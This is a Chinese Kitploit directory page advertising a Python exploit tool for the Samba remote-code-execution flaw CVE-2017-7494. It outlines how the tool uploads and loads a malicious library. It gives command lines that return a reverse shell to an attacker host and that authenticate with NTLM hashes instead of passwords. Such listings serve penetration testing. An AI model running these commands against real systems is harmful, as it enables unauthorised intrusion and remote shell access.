Skip to content
KitploitKITPLOIT
工具博客
Log in
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

订阅源联系隐私© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
noSAMBAnoCRY-CVE-2017-7494 — CVE-2017-7494 python 漏洞利用 | Kitploit
工具/GitHubGitHub/0xm4ud/nosambanocry-cve-2017-7494
Payload生成漏洞分析漏洞利用Shellcode渗透测试远程访问工具
GitHub0xm4ud/nosambanocry-cve-2017-7494

noSAMBAnoCRY-CVE-2017-7494

CVE-2017-7494 python 漏洞利用

查看仓库
6195年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

noSAMBAnoCRY CVE-2017-7494

针对 SAMBA CVE-2017-7494 漏洞(又名 is_know_pipename)的远程利用工具

详情

该利用工具分为 3 个部分:

  • 在以下架构上编译 evilLib:x86_64、x86 或 i686
  • 找到可写共享并将 evilLib 上传到它!
  • 加载 evilLib,如果一切顺利,获得 RCE!

只要目标存在漏洞且 payload 对目标操作系统和架构正确,该利用工具相当可靠。

使用方法

针对目标运行利用工具,等待 shell 生成:

$ python noSAMBAnoCRY.py -r RHOST
$ python noSAMBAnoCRY.py -r RHOST -u userTest -P 123 --lhost RevShellIP --lport RevShellPort 

对于 samba 3.5.0 > 3.6.0 版本,只需添加参数 -o 1

python noSAMBAnoCRY.py -r RHOST --lhost LHOST --lport LPORT -o 1

运行你自己的自定义 .so:

$ python noSAMBAnoCRY.py -r RHOST -u userTest --hashes 00000000000000000000000000000000:3DBDE697D71690A769204BEB12283678 -c cp.so

对于自定义 samba 端口,使用参数 -p:

$ python noSAMBAnoCRY.py -t RHOST -p 4450 -u userTest -P 123 --rhost shell_ip --rport shell_port

如果遇到 smbpasswd 哈希且无法破解,现在可以使用参数 --hashes=LM:NT 传递哈希:

$ python noSAMBAnoCRY.py -r RHOST -u userTest --hashes=00000000000000000000000000000000:3DBDE697D71690A769204BEB12283678 --lhost RevShellIP

免责声明

此仓库灵感来源于仓库:joxeankoret/exploit-CVE-2017-7494 和 Archivaldo

下载工具